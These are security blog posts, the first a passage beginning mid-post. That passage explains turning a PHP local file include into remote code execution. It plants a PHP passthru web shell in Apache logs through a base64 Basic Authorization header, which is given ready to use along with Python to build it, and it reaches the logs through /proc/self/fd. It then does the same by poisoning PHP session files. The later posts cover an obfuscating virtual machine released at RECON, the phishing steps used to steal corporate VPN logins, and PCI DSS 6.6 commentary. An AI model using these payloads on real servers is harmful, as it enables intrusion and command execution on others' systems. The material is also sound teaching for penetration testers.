If the ‘cmdline’ entry does not contain the configuration file, there is another option. The per-process proc entry also contains a directory called ‘fd’. This directory exports a numbered entry for each file descriptor the process currently holds. While writing a PoC for this post on a 2.6.20 kernel, we noticed that at some point a kernel developer had had the foresight to set the permissions on these entries so that they could be read only by the instantiating user. We tasked intern Y with finding the change, and after grepping the diffs of every kernel release (ever… i.e. wget -r --no-parent http://www.kernel.org/pub/linux/kernel/) he found it: in May of 2007 the following patch was committed to address the case where a process opens a file and then drops its privileges (interestingly, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. With this new access, we are able to read the files opened by the Apache process directly through these proc entries. By iterating the file name upward from ‘0’, we can reach the HTTPd log file, which will undoubtedly be open for use by the web server. Simply include ‘/proc/self/fd/<fd number>’ until you hit the right file descriptor.
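
The enumeration can be sketched as a loop over descriptor numbers. This Linux-only C sketch (find_fd is a hypothetical name) resolves each /proc/self/fd/<n> symlink with readlink() and stops at the first target containing a given substring. An attacker going through a PHP include sees only file contents, not link targets, so this is a local illustration of what those entries point to rather than the exploit itself.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Walk /proc/self/fd/0 .. /proc/self/fd/<max_fd - 1> (Linux-specific) and
 * return the first descriptor whose symlink target contains `needle`,
 * or -1 if none does. Descriptor numbers that are not open are skipped.
 */
static int find_fd(const char *needle, int max_fd)
{
    char path[64], target[4096];
    for (int fd = 0; fd < max_fd; fd++) {
        snprintf(path, sizeof path, "/proc/self/fd/%d", fd);
        ssize_t len = readlink(path, target, sizeof target - 1);
        if (len < 0)
            continue;                 /* no such descriptor */
        target[len] = '\0';           /* readlink() does not NUL-terminate */
        if (strstr(target, needle) != NULL)
            return fd;
    }
    return -1;
}
```

Against Apache, the equivalent is including /proc/self/fd/0, /proc/self/fd/1, and so on, and recognizing the log by its contents.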

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine which fields we actually control. It is commonly believed that you can arbitrarily enter text into Apache logs by putting code into GET variables or the requested path. This is generally not the case, as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header, which for Basic authentication is base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET['cmd']); ?>:doesn't matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.
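The header value can be produced with a few lines of Python. This sketch simply joins the username and password with a colon and base64 encodes the result, as HTTP Basic authentication specifies; the helper name basic_auth_header is our own. The PHP payload goes in the username, so it must not contain a colon.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build an HTTP Basic Authorization header value.

    username:password is base64 encoded, so characters such as '<', '$'
    and quotes never pass through URL encoding on their way to the log.
    """
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


# The PHP payload is the username; the password is irrelevant.
payload = "<?php passthru($_GET['cmd']); ?>"
print("Authorization: " + basic_auth_header(payload, "doesn't matter"))
```

Running this prints exactly the Authorization header shown above.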

PHP code as basic auth username


Assuming the stars align and this method is successful, there is still one more caveat. On production HTTP servers the log files tend to be rather large, often in the range of 200 MB. Your PHP code is going to be at the very end of the current log file, which means that each command you run may take a very long time (depending on connection speed) before the page displays its output. It is possible to use the error_log instead, as it is likely somewhat smaller, but it can still be much larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces, but their internals are sometimes quite different. In PHP a session is started using, logically enough, session_start(). This code can be found in ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request; if not, it creates a random session id and sets the cookie in the response to the user. It also registers the global $_SESSION variable, which is tied directly to a file stored in the session save directory (session.save_path, commonly the system temporary directory). This file contains every variable set in the session context, serialized in PHP’s session format.
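To see why a user-controlled string is enough, it helps to know what the session file looks like. With PHP’s default serialize handler (session.serialize_handler = php), each variable is written as name|serialized_value, and strings are length-prefixed rather than escaped. The sketch below reproduces that layout for string values only; it is an illustration, not PHP’s implementation, and ‘signature’ is just the example field used later in this post.

```python
def php_session_encode(variables: dict) -> str:
    """Approximate PHP's default 'php' session serializer for string values.

    Each entry becomes: name|s:<byte length>:"<value>";
    """
    parts = []
    for name, value in variables.items():
        if not isinstance(value, str):
            raise TypeError("this sketch only handles string values")
        length = len(value.encode("utf-8"))  # PHP counts bytes, not characters
        parts.append(f'{name}|s:{length}:"{value}";')
    return "".join(parts)


print(php_session_encode({"signature": "<?php passthru($_GET['cmd']); ?>"}))
# signature|s:32:"<?php passthru($_GET['cmd']); ?>";
```

When such a file is included, PHP echoes the serialized text around the <?php ... ?> block as plain output and executes the code inside it.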

In the case of an application that tracks session information, any setting stored as a string that the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session id is a random hash, it is trivial to retrieve because it is stored locally in a cookie (named PHPSESSID by default).
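The path to include can be derived directly from the session cookie. This sketch assumes the default cookie name PHPSESSID and a save path of /tmp; both are configurable (session.name and session.save_path), so adjust them for the target. It uses the standard library’s http.cookies module to parse a Cookie header, and the session id shown is a made-up placeholder.

```python
from http.cookies import SimpleCookie


def session_file_path(cookie_header: str,
                      cookie_name: str = "PHPSESSID",
                      save_path: str = "/tmp") -> str:
    """Return the on-disk session file for the session id in a Cookie header."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    if cookie_name not in cookie:
        raise KeyError(f"no {cookie_name} cookie present")
    session_id = cookie[cookie_name].value
    return f"{save_path.rstrip('/')}/sess_{session_id}"


print(session_file_path("PHPSESSID=3c7e1b0a9f; lang=en"))
# /tmp/sess_3c7e1b0a9f
```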

Viewing the PHP session cookie


In our simple example, our session has a few variables, but the simplest to control arbitrarily is a field called ‘signature’. PHP applications tend to store all sorts of interesting things in session variables, and there is often a string that you control arbitrarily. In this case, by setting our ‘signature’ to PHP code, we can gain command execution by including this session file.

Putting it all together


Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.


MiniVM RECON Release

June 14, 2008

Here are the slides for the talk I gave at RECON, “Creating Code Obfuscating Virtual Machines”.  Videos of all the talks will also be made available on the RECON website.  To get started writing your own virtual machine or programming for the MiniVM, you’ll need to download the MiniVM suite (see below).  This has the core CPU (aka VM) under core/minivm.inc.  This file was intended to be compiled by MASM; you could, of course, compile it to an object file and link it into your C code.

There is also a directory for compilers.  There is currently just one, and it’s Ruby based.  This compiler is easily extensible, so you can use it for any VM you decide to create yourself.  This should speed up development and give you a lot more flexibility when writing your own VMs.  Both the compiler and the VM core *should* work on other platforms, but I haven’t tested compiling the core with NASM yet.

These instructions are currently supported by MiniVM:

  • MOV r32, r32
  • MOV [r1], r32
  • MOV r1, [r1]
  • MOV r32, value
  • CMP r32, value
  • INC/DEC r32
  • ADD/SUB r32, value
  • AND/OR r1
  • XOR r32,r32
  • PUSH/POP r32
  • JMP (Relative address / Direct Address)
  • JE, JL, JG value
  • CALL r1/value
  • EXIT

r32 in most cases means any of the registers.  If you are using the supplied compiler and you enter an unsupported form of an instruction, it will not only give an error but also show you all the valid ways to use that instruction.

There are four general purpose registers: r1, r2, r3, and r4, with r1 acting as the primary register.  Every instruction works with r1, but not necessarily with the others.  There are also the IP and SP registers for instruction pointer and stack pointer manipulation, as well as a few others.  See the slides for more information or simply look at the core source.
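To make the register model concrete, here is a toy interpreter for a handful of the instructions listed above. It is a minimal sketch and not MiniVM itself: MiniVM is MASM code with its own bytecode encoding, whereas this version represents instructions as Python tuples, treats jump targets as absolute instruction indexes, lets ADD/SUB take a register source for brevity, and keeps the result of CMP in a single flag field of our own design.

```python
MASK = 0xFFFFFFFF  # registers are treated as 32-bit unsigned values


class ToyVM:
    """Tiny register VM: r1-r4 general purpose, plus IP and a stack (SP)."""

    def __init__(self):
        self.regs = {"r1": 0, "r2": 0, "r3": 0, "r4": 0}
        self.stack = []  # SP is implicitly len(self.stack)
        self.ip = 0      # index of the next instruction
        self.flag = 0    # result of the last CMP: -1, 0 or 1

    def _val(self, operand):
        # Operands are either register names or integer immediates.
        return self.regs[operand] if isinstance(operand, str) else operand

    def run(self, program, max_steps=10_000):
        for _ in range(max_steps):
            if self.ip >= len(program):
                break
            op, *args = program[self.ip]
            self.ip += 1
            if op == "MOV":
                self.regs[args[0]] = self._val(args[1]) & MASK
            elif op == "ADD":
                self.regs[args[0]] = (self.regs[args[0]] + self._val(args[1])) & MASK
            elif op == "SUB":
                self.regs[args[0]] = (self.regs[args[0]] - self._val(args[1])) & MASK
            elif op == "INC":
                self.regs[args[0]] = (self.regs[args[0]] + 1) & MASK
            elif op == "DEC":
                self.regs[args[0]] = (self.regs[args[0]] - 1) & MASK
            elif op == "XOR":
                self.regs[args[0]] ^= self._val(args[1]) & MASK
            elif op == "CMP":
                a, b = self._val(args[0]), self._val(args[1])
                self.flag = (a > b) - (a < b)
            elif op == "JMP":
                self.ip = args[0]
            elif op in ("JE", "JL", "JG"):
                if self.flag == {"JE": 0, "JL": -1, "JG": 1}[op]:
                    self.ip = args[0]
            elif op == "PUSH":
                self.stack.append(self.regs[args[0]])
            elif op == "POP":
                self.regs[args[0]] = self.stack.pop()
            elif op == "EXIT":
                break
            else:
                raise ValueError(f"unsupported instruction: {op}")
        return self.regs


# Sum 5 + 4 + 3 + 2 + 1 into r2 using a countdown loop in r1.
program = [
    ("MOV", "r1", 5),     # 0
    ("MOV", "r2", 0),     # 1
    ("ADD", "r2", "r1"),  # 2: loop body
    ("DEC", "r1"),        # 3
    ("CMP", "r1", 0),     # 4
    ("JG", 2),            # 5: repeat while r1 > 0
    ("EXIT",),            # 6
]
print(ToyVM().run(program)["r2"])  # 15
```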

I will be maintaining both MiniVM and the compiler.  Please send me any patches or updates to either of them.  Also, if you write anything really cool for MiniVM, I would like to see that as well.  I’m sure the solutions for the crackme will fill up quickly, but if you write up a good tutorial, send it to me and I’ll post it.

Download:

miniVM

Slides

miniVMCrackme1

Send emails to: craig.smith at neohapsis.com


RECON 2008

June 9, 2008

I will be giving a talk at the RECON conference in Montreal this weekend (June 13-15).  For those of you who haven’t been to RECON, it is a fantastic conference.  RECON considers itself a security conference, but it is much more than that.  There are many very technical talks that typically involve different aspects of reverse engineering just about anything.  Perfect for security researchers, the anti-virus community, or anybody interested in studying the inner workings of things.

I am very excited to be presenting in Montreal and have some fun tools to release after the talk.  My talk is about writing your own virtual machine for the purposes of code obfuscation.  It should be around noon-ish on Saturday, but that time may change.  The goal of the talk is not just to teach what an embedded virtual machine is or how it works, but also to allow you to build your own.  I will be releasing a virtual CPU that you can play with, as well as an assembler-like language you can use to compile code for your virtual machine.  The compiler is written in Ruby and is easily extended, so you can quickly write your own language for your own processor.  I will also have a crackme for you to play with :D

Should be lots of fun!  I’ll be there on Friday, but I will be taking off early Sunday morning to get home for Father’s Day (need to support the lil’ Neophites).  So be sure to say ‘Hi’ at the party.

–Craig Smith

Updated to include posted link to crackme


Easiest Way into a Company

May 22, 2008

One web page and one email are all you need to gain access to a major corporation’s internal network. Catchy, I know, but this is not an exaggeration of what an attacker can do. Combined with exploiting a few systems on the internal network, an attacker can have free rein. Securing your network infrastructure begins with your employees. I don’t think you will extract any new techniques or concepts from this post; however, it should shed some light on the importance of safe end-user practices, as well as of securing internal networks and resources.

Much of the governance and regulatory focus is on securing your external networks, but what if attackers get in? We have seen a rise in external vulnerability scans and a decrease in internal/external penetration tests. Did we forget security awareness, defense in depth, network architecture, or even the most basic administrative practices? Not surprisingly, it seems corporations are searching for that check mark on their audit rather than being concerned with actual security.

So what, right?

Even the most security-aware corporations are still falling victim to social engineering exercises. Valuable resources an attacker can use are found in the most trivial places, such as social networking sites. Anyone can compile an adequate employee list in minutes from sites such as LinkedIn, Facebook, MySpace, etc. From the vast amount of information that can be collected from social networking sites, message boards, and online groups, you can realistically create an organization chart (which helps in addressing employees and in focusing your phishing attack).

Scenario:

Currently, much of the workforce has logged into a VPN or OWA at least once. Corporations are offering many services remotely to keep their workers adequately connected. These basic infrastructure items seem to be among the most exposed and widespread systems for an attacker to prey on. The first step an attacker takes is basic recon and choosing targets. Employees in administrative or sales roles are often selected because they tend to log in to resources remotely. Next, an attacker will find an external-facing login prompt and clone it to a dummy system with basic logging that records the visitor’s IP address and credentials. After that, well-crafted emails direct unsuspecting users to the dummy login… Done. Simple as that: login credentials obtained within minutes.

How do we protect from here:

There are three fronts that could dramatically improve the outcome of these scenarios. First, end-user training and policies geared towards making employees more aware of possible attacks and best practices. I am not talking about handing a policy to the employee and having them read it, either. Second, internal penetration tests are still valuable; they cover a number of areas that help protect against attacks targeting employees and minimize the impact of more sophisticated attacks. This may include additional tasks such as hardening hosts, segregating networks and assets, and adjusting the appropriate policies. Third, static passwords on critical externally facing systems should be replaced with a more secure method such as token authentication. The truth is there is no magic bullet to prevent phishing or social engineering attacks; we will always be combating the human tendency to trust.


My $0.02 on PCI DSS 6.6.

May 6, 2008

On April 15, the PCI Security Standards Council released a clarification of DSS Requirement 6.6.

Requirement 6.6 states that all web-facing applications must be protected against known attacks, either by having a code review performed or by installing an application-layer firewall (WAF) in front of the web application.

I am of the opinion that the clarification document for Requirement 6.6 still does not address the issue adequately, and it leaves room for misinterpretation about code review and WAFs.

Let’s start off with observation #1.

From the Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified document:

“Manual reviews/assessments may be performed by a qualified internal resource or a qualified third party. In all cases, the individual(s) must have the proper skills and experience to understand the source code and/or web application, know how to evaluate each for vulnerabilities, and understand the findings. Similarly, individuals using automated tools must have the skills and knowledge to properly configure the tool and test environment, use the tool, and evaluate the results. If internal resources are being used, they should be organizationally separate from the management of the application being tested. For example, the team writing the software should not perform the final review or assessment and verify the code is secure.”

What makes an internal resource qualified? Does the QSA qualify this internal resource?

There currently is no standard certification in our industry for code review, and in my experience, very few organizations have any staff that could perform adequate code review if the focus is on identifying security relevant issues.

Scenario 1: Development team uses someone from the IT/QA group to run a web application vulnerability scanner against their web application.

Does this meet Requirement 6.6?
Absolutely not.

Web application vulnerability scanners do not find all vulnerabilities; in addition, they produce a lot of false positives. Here at Neohapsis we have seen that, and so have others (see “Rolling Review: Web Application Scanners”).

“Ultimately, you can’t automate your way to secure software–any combination of analysis tools is only as effective as the security knowledge of the user. As Michael Howard, co-author of Writing Secure Code (Microsoft Press, 2002) and one of the lead architects of Microsoft’s current security posture, put it in his blog: ‘Not-so-knowledgeable-developer + great tools = marginally more secure code.’

“We recommend taking advantage of documented processes, including Microsoft’s SDL (Security Development Lifecycle), The Open Web Application Security Project’s CLASP (Comprehensive Lightweight Application Security Process) and general techniques available at the National Cyber Security Division’s ‘Build Security In’ portal.” (“Automated Code Scanners,” Network Computing Magazine, April 16, 2006)

Web application vulnerability scanners should be used as a tool in conjunction with a full code review.

Observation #2: Option #2 in Requirement 6.6.

I find this to be the band-aid approach to passing 6.6. Web application firewalls (WAFs) should be used as an additional layer of security, not as a band-aid for avoiding code reviews. Would we consider an IDS or a firewall to be the resolution to running unnecessary services on a system, or a way to avoid hardening systems or configuring them to best practices or vendor-recommended guidelines? Similarly, WAFs are another step in the principle of Defense-in-Depth (DiD), but they are by no means a solution to securing an application.

For Requirement 6.6 to be taken seriously, it needs to strike a balance that includes source code review, a web application vulnerability scanner used as a tool, and a WAF. There are ways to do this. If an organization implements a solid SDL process, you only need to do sample source code review during the development phase, since many of the initial threats were identified during the threat analysis phase. You also have secure coding practices and modules that already address many issues, such as poor input validation. If one is looking to spend less time finding security issues after a production environment has been deployed, one has to look at security right from the start. This holds true when you are building out a secure network or DMZ, and it also holds true for the design and development of an application.

The bottom line is that the clarification does not really help out overall.

PCI or not, a proper SDLC implementation and process, developers going through secure code training, and having a proper set of tools will lead to a more secure application.


Speaking at HickTech

April 29, 2008

I’m always interested in finding new ways that people are looking at risk and information security. To that end, I’m making the trip today up to Owen Sound, ON to participate in HickTech. I was supposed to be a part of it last year, but missed out due to a scheduling conflict.

This year, I’m excited to talk to a whole bunch of people about the way that business and government in rural areas are dealing with information security and risk management. While I’m going there to speak, I hope to learn a great deal, as well.

And, with a schedule like this one, how could I not? Topics like “Agri-Food Traceability” and the challenges of deploying broadband to rural environments are definitely new to me.